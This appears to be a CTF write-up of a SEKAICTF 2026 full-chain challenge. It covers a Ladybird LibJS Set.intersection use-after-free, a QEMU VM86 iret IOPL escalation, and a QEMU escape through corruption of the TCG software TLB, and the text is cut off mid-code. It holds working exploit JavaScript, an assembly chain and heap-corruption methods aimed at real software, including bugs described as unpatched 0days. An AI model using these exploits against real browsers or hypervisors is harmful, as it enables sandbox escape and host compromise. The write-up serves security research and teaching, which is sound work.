SEKAICTF 2026: 3in1

Qyn Qyn #ctf#sekaictf#kernel#pwn

A full-chain SEKAICTF 2026 challenge covering Ladybird, a QEMU LPE, and a QEMU escape.

SEKAICTF 2026: 3in1

With a clear decline on competiveness across the board for CTFs, now AI has taken over, we decided to make some harder challenges for this last year.
And so I’ve created two challenges for SEKAICTF this year starting with a full chain, combining two 0days and a new way to exploit a n-day with less primitives than previous researchers from ottersec.

Components

  • Ladybird
  • QEMU LPE
  • QEMU escape

3in1: Ladybird

Qyn Qyn #pwn#ctf#sekaictf

Ladybird 0day

The first part of the challenge is to escape the ladybird LibJS shell. This requires an 0day, since we’re running pretty much the latest version. I was planning to do a LibJS challenge for a while now, since I had been hoarding an 0day for over a year (ever since I previously saw a ladybird challenge). But sadly, some time before the CTF started it was patched.

Another funny thing that happened two weeks before the CTF, when the LibJS (/ ladybird) part was already done, a commit dropped that killed my original exploitation technique for this new bug.

Bug

So since our last 0day has been patched, we have to find a new one. For the challenge itself, I patched out all the internal functions, except gc() (I was feeling nice) and compiled a js only shell.

The intended bug for this challenge lies in Set.intersection:

SetPrototype.c
// 24.2.4.9 Set.prototype.intersection ( other ), https://tc39.es/ecma262/#sec-set.prototype.intersection
JS_DEFINE_NATIVE_FUNCTION(SetPrototype::intersection)
{
auto& realm = *vm.current_realm();
// 1. Let O be the this value.
// 2. Perform ? RequireInternalSlot(O, [[SetData]]).
auto set = TRY(typed_this_object(vm));
// 3. Let otherRec be ? GetSetRecord(other).
auto other_record = TRY(get_set_record(vm, vm.argument(0)));
// 4. Let resultSetData be a new empty List.
auto result = Set::create(realm);
// 5. If SetDataSize(O.[[SetData]]) ≤ otherRec.[[Size]], then
if (set->set_size() <= other_record.size) {
// a. Let thisSize be the number of elements in O.[[SetData]].
// b. Let index be 0.
// c. Repeat, while index < thisSize,
for (auto const& element : *set) { // [1]. BUG
// i. Let e be O.[[SetData]][index].
// ii. Set index to index + 1.
// iii. If e is not empty, then
// 1. Let inOther be ToBoolean(? Call(otherRec.[[Has]], otherRec.[[SetObject]], « e »)).
auto in_other = TRY(call(vm, *other_record.has, other_record.set_object, element.key)).to_boolean();
// 2. If inOther is true, then
if (in_other) {
// a. NOTE: It is possible for earlier calls to otherRec.[[Has]] to remove and re-add an element of O.[[SetData]], which can cause the same element to be visited twice during this iteration.
// b. If SetDataHas(resultSetData, e) is false, then
if (!set_data_has(result, element.key)) {
// i. Append e to resultSetData.
result->set_add(element.key);
}
}
// 3. NOTE: The number of elements in O.[[SetData]] may have increased during execution of otherRec.[[Has]].
// 4. Set thisSize to the number of elements in O.[[SetData]].
}
}
// 6. Else,
39 collapsed lines
else {
// a. Let keysIter be ? GetIteratorFromMethod(otherRec.[[SetObject]], otherRec.[[Keys]]).
auto keys_iterator = TRY(get_iterator_from_method(vm, other_record.set_object, other_record.keys));
// b. Let next be NOT-STARTED.
Optional<Value> next;
// c. Repeat, while next is not DONE,
do {
// i. Set next to ? IteratorStepValue(keysIter).
next = TRY(iterator_step_value(vm, keys_iterator));
// ii. If next is not DONE, then
if (next.has_value()) {
// 1. Set next to CanonicalizeKeyedCollectionKey(next).
next = canonicalize_keyed_collection_key(*next);
// 2. Let inThis be SetDataHas(O.[[SetData]], next).
auto in_this = set_data_has(set, *next);
// 3. If inThis is true, then
if (in_this) {
// a. NOTE: Because other is an arbitrary object, it is possible for its "keys" iterator to produce the same value more than once.
// b. If SetDataHas(resultSetData, next) is false, then
if (!set_data_has(result, *next)) {
// i. Append next to resultSetData.
result->set_add(*next);
}
}
}
} while (next.has_value());
}
// 7. Let result be OrdinaryObjectCreate(%Set.prototype%, « [[SetData]] »).
// 8. Set result.[[SetData]] to resultSetData.
// 9. Return result.
return result;
}

The bug here is auto const& element : *set, where element is not a copy, but a reference into the backing store of the set. A Set in LibJS is backed by a Map:

Set.h
class JS_API Set : public Object {
JS_OBJECT(Set, Object);
GC_DECLARE_ALLOCATOR(Set);
public:
static GC::Ref<Set> create(Realm&);
virtual void initialize(Realm&) override;
virtual ~Set() override = default;
virtual bool is_set_object() const final { return true; }
// NOTE: Unlike what the spec says, we implement Sets using an underlying map,
// so all the functions below do not directly implement the operations as
// defined by the specification.
void set_clear() { m_values->map_clear(); }
bool set_remove(Value const& value) { return m_values->map_remove(value); }
bool set_has(Value const& key) const { return m_values->map_has(key); }
void set_add(Value const& key) { m_values->map_set(key, js_undefined()); }
size_t set_size() const { return m_values->map_size(); }
auto begin() const { return const_cast<Map const&>(*m_values).begin(); }
auto begin() { return m_values->begin(); }
auto end() const { return m_values->end(); }
GC::Ref<Set> copy() const;
private:
explicit Set(Object& prototype);
virtual void visit_edges(Visitor& visitor) override;
GC::Ptr<Map> m_values;
};
// 24.2.1.1 Set Records, https://tc39.es/ecma262/#sec-set-records
struct SetRecord {
GC::Ref<Object const> set_object; // [[SetObject]]
double size { 0 }; // [[Size]
GC::Ref<FunctionObject> has; // [[Has]]
GC::Ref<FunctionObject> keys; // [[Keys]]
};

Where Map::clear, basically frees its backing HashTable.

So an easy PoC for this is:

let key = {};
let s = new Set([key]);
let other = {
size: 1,
has() {
s.clear(); // frees/replaces storage being iterated
return true;
},
keys() {
return [][Symbol.iterator]();
},
};
let result = s.intersection(other);
Note (Where we mimic a set)
Set.c
// 24.2.1.2 GetSetRecord ( obj ), https://tc39.es/ecma262/#sec-getsetrecord
ThrowCompletionOr<SetRecord> get_set_record(VM& vm, Value value)
{
// 1. If obj is not an Object, throw a TypeError exception.
if (!value.is_object())
return vm.throw_completion<TypeError>(ErrorType::NotAnObject, value);
auto const& object = value.as_object();
// 2. Let rawSize be ? Get(obj, "size").
auto raw_size = TRY(object.get(vm.names.size));
// 3. Let numSize be ? ToNumber(rawSize).
auto number_size = TRY(raw_size.to_number(vm));
// 4. NOTE: If rawSize is undefined, then numSize will be NaN.
// 5. If numSize is NaN, throw a TypeError exception.
if (number_size.is_nan())
return vm.throw_completion<TypeError>(ErrorType::NumberIsNaN, "size"sv);
// 6. Let intSize be ! ToIntegerOrInfinity(numSize).
auto integer_size = MUST(number_size.to_integer_or_infinity(vm));
// 7. If intSize < 0, throw a RangeError exception.
if (integer_size < 0)
return vm.throw_completion<RangeError>(ErrorType::NumberIsNegative, "size"sv);
// 8. Let has be ? Get(obj, "has").
auto has = TRY(object.get(vm.names.has));
// 9. If IsCallable(has) is false, throw a TypeError exception.
if (!has.is_function())
return vm.throw_completion<TypeError>(ErrorType::NotAFunction, has);
// 10. Let keys be ? Get(obj, "keys").
auto keys = TRY(object.get(vm.names.keys));
// 11. If IsCallable(keys) is false, throw a TypeError exception.
if (!keys.is_function())
return vm.throw_completion<TypeError>(ErrorType::NotAFunction, keys);
// 12. Return a new Set Record { [[SetObject]]: obj, [[Size]]: intSize, [[Has]]: has, [[Keys]]: keys }.
return SetRecord { .set_object = object, .size = integer_size, .has = has.as_function(), .keys = keys.as_function() };
}

Which gives us a free UaF on element.key, which in the case of a Set backed by a Map is the object itself.

Exploit

The first primitive we can easily create from this is fakeobj:

function fakeobj(addr) {
let encoded = OBJECT_TAG | (addr & PAYLOAD_MASK);
let payload_b64 = encoded_value_payload(encoded);
let keep = [];
let key = {};
let s = new Set([key]);
let other = {
size: 1,
has() {
s.clear();
let scratch = new Uint8Array(FAKEOBJ_RECLAIM_SIZE);
let dv = new DataView(scratch.buffer);
scratch.setFromBase64(payload_b64);
keep.push(scratch);
return true;
},
keys() {
return [][Symbol.iterator]();
}
};
return Array.from(s.intersection(other))[0];
}

1

For a leak we do the following:

function leak_ptr_try_for(candidates, iter) {
let keep = [];
let set_key = { set_key: iter };
let s = new Set([set_key]);
let other = {
size: 1,
has() {
s.clear(); // [1]
gc();
for (let j = 0; j < 192; ++j) {
let wm = new WeakMap();
wm.set(candidates[(iter + j) % candidates.length], 0x1337);
keep.push(wm);
}
return true;
},
keys() {
return [][Symbol.iterator]();
},
};
let v = Array.from(s.intersection(other))[0];
if (typeof v !== "number" || v === 0)
return 0n;
let bits = f64_to_u64(v);
if (!looks_like_ptr(bits))
return 0n;
return bits;
}

This frees the backing bucket in [1], runs the gc() and creates a WeakMap whose backing store overlaps with the old Set storage.

Just like a regular Set, the backing store of a WeakMap is a HashMap, but in this case: HashMap<GC::Ptr<Cell>, Value> m_values instead of HashMap<Value, Value, ValueTraits> m_entries; for a Map (So a Set as well).

So in this case we try to reclaim a Value from the Set (8 bytes) with a GC::Ptr<Cell> from the WeakMap also 8 bytes (pointer), for which the pointer converted back to a Value is a f64 -> leak.

This basically is our addrOf primitive from which we can target an ArrayBuffer as victim.

From here there’s many ways to get r/w into code exec, I’ll give an example:

let map = new Map();
map.set(bucket0, u64ToF64(MAP_FAKE_HEADER));
map.set(bucket1, u64ToF64(validationAddr));
let iterator = map.entries();
iterator.a = u64ToF64(MAP_FAKE_HEADER);

Where bucket0 and bucket1 are chosen so the hashes land in the first and second bucket respectively. Then we try and leak the MapIterator object and interpret like:

Real memory address Real MapIterator field Fake reader JS::Object field
I + 0x28 Object::m_private_elements reader + 0x00 vptr-ish word
I + 0x30 Object::m_inline_named_storage[0] == iterator.a == MAP_FAKE_HEADER reader + 0x08 flags/kind/length
I + 0x38 Object::m_inline_named_storage[1] reader + 0x10 = m_shape
I + 0x40 BuiltinIterator vptr reader + 0x18 m_named_properties
I + 0x48 MapIterator::m_map reader + 0x20 = m_indexed_elements
I + 0x50 m_done / m_iteration_kind reader + 0x28 = m_private_elements
I + 0x58 MapIterator::m_iterator reader + 0x30 inline storage

So now we can read i.e. reader[13] == reader->m_indexed_elements[13] == iterator->m_map[13]. From here we can recover the bucket==reader[13] and read/write into the buckets array. From here we have the following layout:

+0x00 bucket0 Entry.key/
+0x08 bucket0 Entry.value = header == flags/kind/length
+0x10 bucket1 state/hash/padding
+0x18 bucket1 Entry.key
+0x20 bucket1 Entry.value = target pointer == m_indexed_elements

Then we can fakeobj over the bucket+8 to mirror the MapIterator as previously and get a limited read / write by overwriting the m_indexed_elements using map.set(bucket1, u64ToF64(addr)). From there we repeatedly target an ArrayBuffer’s data pointer to get full a/b r/w. From there we leak the vtable, get libc, read environ, find return address on the stack and ROP to execve and run our next stage.

Footnotes

  1. We use the base64 as to not accidentally reclaim it with other objects

3in1: QEMU LPE

Qyn Qyn #pwn#ctf#sekaictf

Escalating privileges inside QEMU through a VM86 iret bug.

For the second part of the challenge, we need to somehow gain root (or at least higher privileges) to talk to the virtio-snd device. And because I’ve been hoarding an 0day for this as well for a little bit, it was a perfect fit for this challenge. Although, a current 0day has already been published (without patches) by kqx, the challenge introduces a patch and we have to hunt for a new one.

Bug

The bug is actually a slight variant of https://kqx.io/post/qemu-nday/ but the primitive is even better:

seg_helper.c
/* protected mode iret */
static inline void helper_ret_protected(CPUX86State *env, int shift,
int is_iret, int addend,
uintptr_t retaddr)
{
34 collapsed lines
uint32_t new_cs, new_eflags, new_ss;
uint32_t new_es, new_ds, new_fs, new_gs;
uint32_t e1, e2, ss_e1, ss_e2;
int cpl, dpl, rpl, eflags_mask, iopl;
target_ulong new_eip, new_esp;
StackAccess sa;
cpl = env->hflags & HF_CPL_MASK;
sa.env = env;
sa.ra = retaddr;
sa.mmu_index = x86_mmu_index_pl(env, cpl);
#ifdef TARGET_X86_64
if (shift == 2) {
sa.sp_mask = -1;
} else
#endif
{
sa.sp_mask = get_sp_mask(env->segs[R_SS].flags);
}
sa.sp = env->regs[R_ESP];variant
sa.ss_base = env->segs[R_SS].base;
new_eflags = 0; /* avoid warning */
#ifdef TARGET_X86_64
if (shift == 2) {
new_eip = popq(&sa);
new_cs = popq(&sa) & 0xffff;
if (is_iret) {
new_eflags = popq(&sa);
}
} else
#endif
{
if (shift == 1) {
/* 32 bits */
new_eip = popl(&sa);
new_cs = popl(&sa) & 0xffff;
if (is_iret) {
new_eflags = popl(&sa);
if (new_eflags & VM_MASK) {
goto return_to_vm86;
}
}
} else {
/* 16 bits */
new_eip = popw(&sa);
new_cs = popw(&sa);
if (is_iret) {
new_eflags = popw(&sa);
}
}
}
142 collapsed lines
LOG_PCALL("lret new %04x:" TARGET_FMT_lx " s=%d addend=0x%x\n",
new_cs, new_eip, shift, addend);
LOG_PCALL_STATE(env_cpu(env));
if ((new_cs & 0xfffc) == 0) {
raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
}
if (load_segment_ra(env, &e1, &e2, new_cs, retaddr) != 0) {
raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
}
if (!(e2 & DESC_S_MASK) ||
!(e2 & DESC_CS_MASK)) {
raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
}
rpl = new_cs & 3;
if (rpl < cpl) {
raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
}
dpl = (e2 >> DESC_DPL_SHIFT) & 3;
if (e2 & DESC_C_MASK) {
if (dpl > rpl) {
raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
}
} else {
if (dpl != rpl) {
raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
}
}
if (!(e2 & DESC_P_MASK)) {
raise_exception_err_ra(env, EXCP0B_NOSEG, new_cs & 0xfffc, retaddr);
}
sa.sp += addend;
if (rpl == cpl && (!(env->hflags & HF_CS64_MASK) ||
((env->hflags & HF_CS64_MASK) && !is_iret))) {
/* return to same privilege level */
cpu_x86_load_seg_cache(env, R_CS, new_cs,
get_seg_base(e1, e2),
get_seg_limit(e1, e2),
e2);
} else {
/* return to different privilege level */
#ifdef TARGET_X86_64
if (shift == 2) {
new_esp = popq(&sa);
new_ss = popq(&sa) & 0xffff;
} else
#endif
{
if (shift == 1) {
/* 32 bits */
new_esp = popl(&sa);
new_ss = popl(&sa) & 0xffff;
} else {
/* 16 bits */
new_esp = popw(&sa);
new_ss = popw(&sa);
}
}
LOG_PCALL("new ss:esp=%04x:" TARGET_FMT_lx "\n",
new_ss, new_esp);
if ((new_ss & 0xfffc) == 0) {
#ifdef TARGET_X86_64
/* NULL ss is allowed in long mode if cpl != 3 */
/* XXX: test CS64? */
if ((env->hflags & HF_LMA_MASK) && rpl != 3) {
cpu_x86_load_seg_cache(env, R_SS, new_ss,
0, 0xffffffff,
DESC_G_MASK | DESC_B_MASK | DESC_P_MASK |
DESC_S_MASK | (rpl << DESC_DPL_SHIFT) |
DESC_W_MASK | DESC_A_MASK);
ss_e2 = DESC_B_MASK; /* XXX: should not be needed? */
} else
#endif
{
raise_exception_err_ra(env, EXCP0D_GPF, 0, retaddr);
}
} else {
if ((new_ss & 3) != rpl) {
raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr);
}
if (load_segment_ra(env, &ss_e1, &ss_e2, new_ss, retaddr) != 0) {
raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr);
}
if (!(ss_e2 & DESC_S_MASK) ||
(ss_e2 & DESC_CS_MASK) ||
!(ss_e2 & DESC_W_MASK)) {
raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr);
}
dpl = (ss_e2 >> DESC_DPL_SHIFT) & 3;
if (dpl != rpl) {
raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr);
}
if (!(ss_e2 & DESC_P_MASK)) {
raise_exception_err_ra(env, EXCP0B_NOSEG, new_ss & 0xfffc, retaddr);
}
cpu_x86_load_seg_cache(env, R_SS, new_ss,
get_seg_base(ss_e1, ss_e2),
get_seg_limit(ss_e1, ss_e2),
ss_e2);
}
cpu_x86_load_seg_cache(env, R_CS, new_cs,
get_seg_base(e1, e2),
get_seg_limit(e1, e2),
e2);
sa.sp = new_esp;
#ifdef TARGET_X86_64
if (env->hflags & HF_CS64_MASK) {
sa.sp_mask = -1;
} else
#endif
{
sa.sp_mask = get_sp_mask(ss_e2);
}
/* validate data segments */
validate_seg(env, R_ES, rpl);
validate_seg(env, R_DS, rpl);
validate_seg(env, R_FS, rpl);
validate_seg(env, R_GS, rpl);
sa.sp += addend;
}
SET_ESP(sa.sp, sa.sp_mask);
env->eip = new_eip;
if (is_iret) {
/* NOTE: 'cpl' is the _old_ CPL */
eflags_mask = TF_MASK | AC_MASK | ID_MASK | RF_MASK | NT_MASK;
if (cpl == 0) {
eflags_mask |= IOPL_MASK;
}
iopl = (env->eflags >> IOPL_SHIFT) & 3;
if (cpl <= iopl) {
eflags_mask |= IF_MASK;
}
if (shift == 0) {
eflags_mask &= 0xffff;
}
cpu_load_eflags(env, new_eflags, eflags_mask);
}
return;
return_to_vm86:
new_esp = popl(&sa);
new_ss = popl(&sa);
new_es = popl(&sa);
new_ds = popl(&sa);
new_fs = popl(&sa);
new_gs = popl(&sa);
/* modify processor state */
cpu_load_eflags(env, new_eflags, TF_MASK | AC_MASK | ID_MASK |
IF_MASK | IOPL_MASK | VM_MASK | NT_MASK | VIF_MASK |
VIP_MASK);
load_seg_vm(env, R_CS, new_cs & 0xffff);
load_seg_vm(env, R_SS, new_ss & 0xffff);
load_seg_vm(env, R_ES, new_es & 0xffff);
load_seg_vm(env, R_DS, new_ds & 0xffff);
load_seg_vm(env, R_FS, new_fs & 0xffff);
load_seg_vm(env, R_GS, new_gs & 0xffff);
env->eip = new_eip & 0xffff;
env->regs[R_ESP] = new_esp;
}

The issue here is that QEMU jumps to return_to_vm86 as soon EFLAGS.VM is set, before rejecting this transition from usermode. return_to_vm86 then just loads the EFLAGS with VM_MASK and IOPL_MASK allowed, so we can add IOPL=3 which in qemu gives a/b physical r/w again, amazing work from the kqx people.

Exploit

It’s easier to show the full exploit path to show what is happening:

; ============================================================
; Stage 0: normal 64-bit userland
; CS = 0x33, RIP = inside child_iopl_probe()
; ============================================================
pushq 0x23 ; USER32_CS, Linux 32-bit compat code selector
pushq 0x00100000 ; 32-bit entrypoint
lretq ; far return: pop RIP/EIP + CS
; Now:
; CS = 0x23
; EIP = 0x00100000
; Execution is 32-bit compat code.
; ============================================================
; Stage 1: 32-bit compat stub at 0x00100000
; ============================================================
[BITS 32]
mov esp, 0x00022000
push 0x00001000 ; GS for VM86
push 0x00001000 ; FS for VM86
push 0x00001000 ; DS for VM86
push 0x00001000 ; ES for VM86
push 0x00002000 ; SS for VM86
push 0x00008000 ; ESP for VM86
push 0x00023002 ; EFLAGS: VM=1, IOPL=3, bit1=1
push 0x00001000 ; CS for VM86
push 0x00000000 ; EIP for VM86
iretd ; opcode 0xcf
; QEMU sees VM=1 in the iret frame and takes return_to_vm86
; which loads IOPL from attacker-controlled EFLAGS
;
; Now:
; VM86 mode
; CS:IP = 0x1000:0x0000
; linear RIP = 0x10000
; SS:SP = 0x2000:0x8000
; EFLAGS has IOPL=3
; ============================================================
; Stage 2: VM86 code at 0x00010000
; ============================================================
[BITS 16]
mov ax, 0x3000
mov ds, ax ; DS base = 0x3000 << 4 = 0x30000
o32 mov eax, 20 ; i386 syscall number 20 = getpid
o32 mov ebp, 0x00028100 ; landing_stack
o32 mov esp, 0x00028100 ; landing_stack
sysenter ; enter Linux compat syscall path
; ============================================================
; Stage 3: Linux compat sysenter return path
; It returns to a patched vDSO landing pad.
; we overwrite that pad with:
; ============================================================
[BITS 32]
pop ebp ; consumes 0x41414141
pop edx ; consumes 0x42424242
pop ecx ; consumes 0x43434343
ret ; returns to after32
; landing_stack contains:
; [0x28100] = 0x41414141
; [0x28104] = 0x42424242
; [0x28108] = 0x43434343
; [0x2810c] = after32
; ============================================================
; Stage 4: after32, same linear page, now 32-bit compat mode
; ============================================================
[BITS 32]
mov ax, 0x2b ; USER_DS
mov ds, ax
pushfd
pop eax
push 0x33 ; USER64_CS
push 0x00101000 ; 64-bit stub address
retf ; far return back to 64-bit user code
; Now:
; CS = 0x33
; RIP = 0x00101000
; ============================================================
; Stage 5: 64-bit stub at 0x00101000
; ============================================================
[BITS 64]
mov rsp, safe_rsp
mov rax, after_iopl
jmp rax
; ============================================================
; Stage 6: normal 64-bit C again, but with IOPL=3
; ============================================================
pushfq
pop rax ; qemu_prim.c checks IOPL bits
cli
sti ; succeeds only if IOPL=3

After which we use the kqx.io technique to obtain physical r/w.

Aftermath

After the CTF I was told that there was some public work on this bug specifically https://patchew.org/QEMU/20260528113808.86036-1-misetic@osec.io/ and https://lore.kernel.org/qemu-devel/20260622082119.11903-1-apolivodaa433@gmail.com/

Thankfully the bug wasn’t patched in time for the CTF :)

3in1: QEMU Escape

Qyn Qyn #pwn#ctf#sekaictf

Escaping QEMU by targeting the TCG software TLB from virtio-snd.

Finally we get to exploit QEMU, a different patch reintroduces a bug previously exploited by ottersec, before reading through the next part, I recommend reading through it to get an understanding of the problem as I’ll just go over the exploitation of that bug.

Anyway, ottersec needed another device driver to escape the guest. This challenge doesn’t give you this luxury and you have to exploit (escape) the guest without it.

Some other fun things about this challenge, the kernel is minimally compiled and doesn’t expose any functionality things required to actually talk to the driver. You have to create this yourself (If you even need them! More on this later).

For this challenge, I’ll go over two ways to exploit this, one original intended path and another (less intended) path created by an unnamed entity during the game that just happened to fall into my hands.

Intended Exploit

First of all, credits for the exploitation idea comes from dicectf bassoon:

Note (Bassoon writeup)

first part is getting consistent heap corruption primitives using the fact that all 7 0x100 tcache entries are almost always contiguous. from here you can get overlapping chunks and prepare a UAF write. next part is figuring out what structure to actually target. we don’t have partial overwrite which forces us to target something that gets allocated after our corruption, and prevents us from dealing with things containing absolute addresses. most important things are allocated in the main heap, and the thread heap is mostly used by TCG.

there may be multiple approaches, but my solution is to overwrite entries in the TCG fast path CPUTLBEntry table, which basically implements the TLB for guest virtual to host virtual address translation. it gets reallocd on the thread heap in tlb_mmu_resize_locked which gets triggered either periodically from tlb_flush_by_mmuidx_async_work which we can’t control very well, or on a single page flush if the page is a large (huge) page. we can thus flush a huge page with invlpg to trigger resizing. the new size is based on a rate calculated within a 100 ms window, so we want to busy loop at cpl0 after the first flush to get a low rate and downsize the table.

there are tables for each mmu_idx type, which is an arch-based classifier. for x64, there are 3 main ones: usermode, kernel mode, and kernel mode running usermode code through SMAP. you could simplify the exploitation by doing it all through one mmu_idx so you don’t need to context switch to trigger TLB activity between invlpg’ing, but i just did it with the usermode TLB anyway and had a kernel module that let me call my own userspace functions at cpl0. the noise taming part is very difficult, since TCG is constantly allocating chunks of 0x28 to insert nodes into qtree during TCG translation within tb_gen_code (called for each basic block). we get around this by stuffing all of our important operations for triggering heap activity like the intel HDA writes and invlpgs into single basic blocks at a time.

we get overlapping chunks and free a size 0x810 for the fast TLB to reclaim when it downsizes to minimum size of 0x40 (0x20 size per entry). each entry in the table has 3 virtual addresses and one addend. the virtual addresses correspond to the guest virtual addresses translations for read, write, and code accesses, and the addend gets added to the virtual address to calculate the host address. we can’t control the addend usefully without leaks, but we can overwrite the virtual address, and the difference between our overwritten one and the old one effectively gets added to the addend during translation. this is how we are able to get reliable memory corruption leaklessly, and i think it’s a pretty cool and novel technique.

the host address a virtual address maps to is dependent on the physical address, so we can get a reliable location in the mapping space by having our vaddr tied to a fixed physical address like 0. the thread heap arena is consistently 0x7e00000 bytes behind the host mapping for physical address 0. 0x7e0 & 0x3f is also 0 so this will be placed at index 0 in the table making it easy to overflow into. so we first map 0x7e00000 to 0, and now overflow the virtual addresses to 0, and when we deref 0 it will hit the TLB and translate as (intended host address - 0x7e00000) + 0 which we have established is just the thread heap arena.

so now we have arb read/write into the first page of the arena which contains things like tcache bins and various pointers to other regions. i leaked the rwx region and main heap, then overwrote two tcache entries to first write shellcode to the rwx region and then overwrite a function pointer in the main heap with a pointer to the shellcode.

all of the past qemu exploits i’ve seen for real vulns usually try to get some explicit leak primitive either from a separate vuln or some random device, but i think it’s cool that it’s theoretically possible in a stable enough environment to do this sort of leakless technique. it does rely on TCG though, maybe i’ll try this challenge again but with KVM and see if it’s still possible.

The compiled kernel doesn’t expose much / if anything to interact with the device, so my solver patches in a couple utilities using the physical r/w:

  • virtual to physical
  • remapping an userspace virtual page to an arbtrary guest physcial 4k page
  • install a 2MiB page-table mapping
  • invlpg
  • (setuid)

TLB / Target

So a quick background recap on the TLB cache; A normal CPU has a Translation Lookaside Buffer, or TLB. It is a cache for page table translations. Instead of walking page tables on every memory access, the CPU remembers that a virtual page recently translated to a particular physical page with particular permissions. Say:

virtual address
|
v
TLB lookup: virtual page -> physical page + permissions
|
v
memory access

When an operating system changes page tables, old cached translations may no longer be correct. A TLB flush invalidates those cached translations. On x86, invlpg addr invalidates the cached translation for one virtual page, while operations such as CR3 reloads can invalidate many entries.

In this exploit, however, the interesting TLB is not the host CPU’s hardware TLB. The interesting object is QEMU TCG’s software TLB. TCG-generated host code also wants memory accesses to be fast, so QEMU keeps its own cache of guest virtual address translations. That cache lives in normal QEMU heap memory. For a guest RAM access in system emulation, the path is roughly:

guest virtual address
|
v
QEMU TCG software TLB lookup
|
+-- hit -> host pointer = guest address + entry.addend
|
+-- miss -> slow path walks guest page tables, fills TLB entry

The fast entry type is CPUTLBEntry:

include/exec/tlb-common.h
3 collapsed lines
#define CPU_TLB_ENTRY_BITS (HOST_LONG_BITS == 32 ? 4 : 5)
/* Minimalized TLB entry for use by TCG fast path. */
typedef union CPUTLBEntry {
struct {
uintptr_t addr_read;
uintptr_t addr_write;
uintptr_t addr_code;
/*
* Addend to virtual address to get host address. IO accesses
* use the corresponding iotlb value.
*/
uintptr_t addend;
};
5 collapsed lines
/*
* Padding to get a power of two size, as well as index
* access to addr_{read,write,code}.
*/
uintptr_t addr_idx[(1 << CPU_TLB_ENTRY_BITS) / sizeof(uintptr_t)];
} CPUTLBEntry;
QEMU_BUILD_BUG_ON(sizeof(CPUTLBEntry) != (1 << CPU_TLB_ENTRY_BITS));

The three addr_* fields are compare values for read, write, and instruction fetch accesses. The addend is the part that turns a guest virtual address into a host pointer:

accel/tcg/cputlb.c
/* Everything else is RAM. */
*phost = (void *)((uintptr_t)addr + entry->addend);
return flags;

So this is good primitive to target, since it directly decides which host address QEMU reads or writes. The lookup table is indexed by the guest virtual page:

accel/tcg/cputlb.c
static inline uintptr_t tlb_index(CPUState *cpu, uintptr_t mmu_idx,
vaddr addr)
{
uintptr_t size_mask = cpu_tlb_fast(cpu, mmu_idx)->mask >> CPU_TLB_ENTRY_BITS;
return (addr >> TARGET_PAGE_BITS) & size_mask;
}

For the minimum table size used later, there are 64 entries, so the mask is 0x3f. Guest address 0 and guest address 0x8000000 both land in index 0:

(0x0 >> 12) & 0x3f = 0
(0x8000000 >> 12) & 0x3f = 0

That lets the exploit first create a legitimate entry for 0x8000000, then corrupt only the compare fields so the same entry also appears valid for guest address 0.

Before corruption, entry 0 looks like:

CPUTLBEntry[0]
+-----------------------------------+
| addr_read = 0x8000000 | flags |
| addr_write = 0x8000000 | flags |
| addr_code = ... |
| addend = host_ptr - 0x8000000 |
+-----------------------------------+

After the virtio-snd overflow writes into the first 0x10 bytes:

CPUTLBEntry[0]
+-----------------------------------+
| addr_read = 0 |
| addr_write = 0 |
| addr_code = ... |
| addend = host_ptr - 0x8000000 |
+-----------------------------------+

Now a guest load from virtual address 0 can pass the fast-path compare, but the preserved addend still points at the host location derived from the old 0x8000000 translation:

host = 0 + (host_ptr - 0x8000000)

For us that lands inside QEMU’s host heap.

Primitives

A QEMU TLB flush invalidates entries in this software cache. For a full flush of one MMU index, QEMU clears the entry table and resets accounting:

accel/tcg/cputlb.c
2 collapsed lines
static void tlb_mmu_flush_locked(CPUTLBDesc *desc, CPUTLBDescFast *fast)
{
desc->n_used_entries = 0;
desc->large_page_addr = -1;
desc->large_page_mask = -1;
desc->vindex = 0;
memset(fast->table, -1, sizeof_tlb(fast));
2 collapsed lines
memset(desc->vtable, -1, sizeof(desc->vtable));
}

For a single-page flush, QEMU normally invalidates one table entry. But QEMU also tracks large-page translations. If the flushed page belongs to a tracked large page, tlb_flush_page_locked() escalates to a full flush for that MMU index:

accel/tcg/cputlb.c
5 collapsed lines
static void tlb_flush_page_locked(CPUState *cpu, int midx, vaddr page)
{
vaddr lp_addr = cpu->neg.tlb.d[midx].large_page_addr;
vaddr lp_mask = cpu->neg.tlb.d[midx].large_page_mask;
/* Check if we need to flush due to large pages. */
if ((page & lp_mask) == lp_addr) {
tlb_flush_one_mmuidx_locked(cpu, midx, get_clock_realtime());
} else {
if (tlb_flush_entry_locked(tlb_entry(cpu, midx, page), page)) {
tlb_n_used_entries_dec(cpu, midx);
}
tlb_flush_vtlb_page_locked(cpu, midx, page);
}
}

We can use this, to i.e. flip a mapped guest region to PROT_NONE and back to PROT_READ | PROT_WRITE. Inside the guest, that makes the kernel update page tables and flush stale guest translations. In TCG, those guest invalidations cause QEMU to throw away affected software TLB entries.

Then with our inserted invlpg primitive, we can install HUGE_VADDR as a 2 MiB mapping. The i386 TCG helper for invlpg reaches:

target/i386/tcg/system/misc_helper.c
void helper_flush_page(CPUX86State *env, target_ulong addr)
{
tlb_flush_page(env_cpu(env), addr);
}

Because HUGE_VADDR is a large mapping, QEMU’s large-page tracking can turn that single-page invalidation into the full-MMU-index flush path and the resize logic is tied to full-table flushing.

The TCG TLB tables are dynamic. QEMU tracks how many entries were used in a short time window. When a flush happens, tlb_mmu_resize_locked() may grow or shrink the table based on that recent usage rate.

The important part for exploitation is that a resize is a normal heap free and allocation:

accel/tcg/cputlb.c
15 collapsed lines
static void tlb_mmu_resize_locked(CPUTLBDesc *desc, CPUTLBDescFast *fast,
int64_t now)
{
size_t old_size = tlb_n_entries(fast);
size_t rate;
size_t new_size = old_size;
int64_t window_len_ms = 100;
int64_t window_len_ns = window_len_ms * 1000 * 1000;
bool window_expired = now > desc->window_begin_ns + window_len_ns;
if (desc->n_used_entries > desc->window_max_entries) {
desc->window_max_entries = desc->n_used_entries;
}
